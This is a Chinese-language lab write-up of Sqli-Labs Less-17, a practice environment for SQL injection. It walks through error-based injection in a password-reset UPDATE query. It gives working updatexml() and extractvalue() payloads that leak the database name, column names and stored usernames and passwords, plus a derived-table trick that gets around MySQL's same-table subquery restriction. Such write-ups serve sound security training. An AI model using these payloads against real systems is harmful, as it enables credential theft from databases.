Chybeta

Sqli-Labs:Less17-writeup

发表于 | 阅读次数

Sqli-Labs是用来练习sql注入的好平台。project地址:https://github.com/Audi-1/sqli-labs
本文测试环境:使用phpstudy集成环境。mysql版本:5.5.53

Less-17 POST-Update Query-Error Based-String

基础知识

三种基本语句。

INSERT

1
2
3
INSERT INTO table_name ( field1, field2,...fieldN )
                       VALUES
                       ( value1, value2,...valueN );

示例:

1
2
3
4
5
6
7
8
9
10
11
12
mysql> desc users;
+----------+-------------+------+-----+---------+----------------+
| Field    | Type        | Null | Key | Default | Extra          |
+----------+-------------+------+-----+---------+----------------+
| id       | int(3)      | NO   | PRI | NULL    | auto_increment |
| username | varchar(20) | NO   |     | NULL    |                |
| password | varchar(20) | NO   |     | NULL    |                |
+----------+-------------+------+-----+---------+----------------+
3 rows in set (0.06 sec)
mysql> insert into users(id,username,password) value(0,"chybeta","chybeta");
Query OK, 1 row affected (0.09 sec)

UPDATE

1
2
UPDATE table_name SET field1=new-value1, field2=new-value2
[WHERE Clause]

示例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
mysql> select id,username,password from users where id=15;                  
+----+----------+----------+                                                
| id | username | password |                                                
+----+----------+----------+                                                
| 15 | chybeta  | chybeta  |                                                
+----+----------+----------+                                                
1 row in set (0.00 sec)                                                     
mysql> update users set username="atebyhc" where id=15;                     
Query OK, 1 row affected (0.08 sec)                                         
Rows matched: 1  Changed: 1  Warnings: 0                                    
mysql> select id,username,password from users where id=15;                  
+----+----------+----------+                                                
| id | username | password |                                                
+----+----------+----------+                                                
| 15 | atebyhc  | chybeta  |                                                
+----+----------+----------+                                                
1 row in set (0.00 sec)                                                     
mysql> update users set username="chybeta",password="atebyhc" where id=15;  
Query OK, 1 row affected (0.00 sec)                                         
Rows matched: 1  Changed: 1  Warnings: 0                                    
mysql> select id,username,password from users where id=15;                  
+----+----------+----------+                                                
| id | username | password |                                                
+----+----------+----------+                                                
| 15 | chybeta  | atebyhc  |                                                
+----+----------+----------+                                                
1 row in set (0.00 sec)

DELETE

1
DROP TABLE table_name ;

这个。。暂时先不演示了。。

Less 17

这题的题目为:[PASSWORD RESET] 。可以推测后端的语句为UPDATE型,约莫如下:

1
update users set password=新密码 where username=账号;

我们post数据为:

1
uname=admin&passwd=chybeta'&submit=Submit

则发现有报错回显:

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1

为单引号,所以可以推测语句为:

1
update users set password='$password' where username='$username';

接下去进行报错注入。

updatexml()

1
UPDATEXML (XML_document, XPath_string, new_value);

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
(以上来自学习笔记 UpdateXml() MYSQL显错注入)

payload:

1
uname=admin&passwd=chybeta' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)#&submit=Submit

可以获取数据库名为:security。

但要获取数据:

1
uname=admin&passwd=chybeta' and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1),0x7e),1)#&submit=Submit

却会显示:

1
You can't specify target table 'users' for update in FROM clause

也就是说不能用update获取当前表的数据,因为update的子查询中不能出现相同的表名。

这个可以先新建一张表,然后再在这个新建的临时表中进行查询:

1
uname=admin&passwd=chybeta' and updatexml(1,concat(0x7e,(SELECT group_concat(0x23,username,0x3a,password,0x23) FROM (select * from users)tmp),0x7e),1)#&submit=Submit

这在sql.log中的语句为:

1
UPDATE users SET password = 'chybeta' and updatexml(1,concat(0x7e,(SELECT group_concat(0x23,username,0x3a,password,0x23) FROM (select * from users)tmp),0x7e),1)#' WHERE username='admin'

其中(select * from users)tmp新建了一张tmp表,外面的SELECT...FROM..是从tmp中获取数据。

updatexml有长度限制,最长32位

extractvalue()

payload:

1
uname=admin&passwd=chybeta' and extractvalue(1,concat(0x7e,database()))#&submit=Submit

得到数据库名称为 security

查字段:

1
uname=admin&passwd=chybeta' and extractvalue(1,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns where table_name = "users")))#&submit=Submit

获取账号密码:

1
uname=admin&passwd=chybeta' and extractvalue(1,concat(0x7e,(SELECT group_concat(0x23,username,0x23,password) FROM (select * from users)tmp)))#&submit=Submit

对应的后端查询语句为:

1
UPDATE users SET password = 'chybeta' and extractvalue(1,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns where table_name = "users")))#' WHERE username='admin'

extractvalue也有长度限制,最长32位

Refference

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】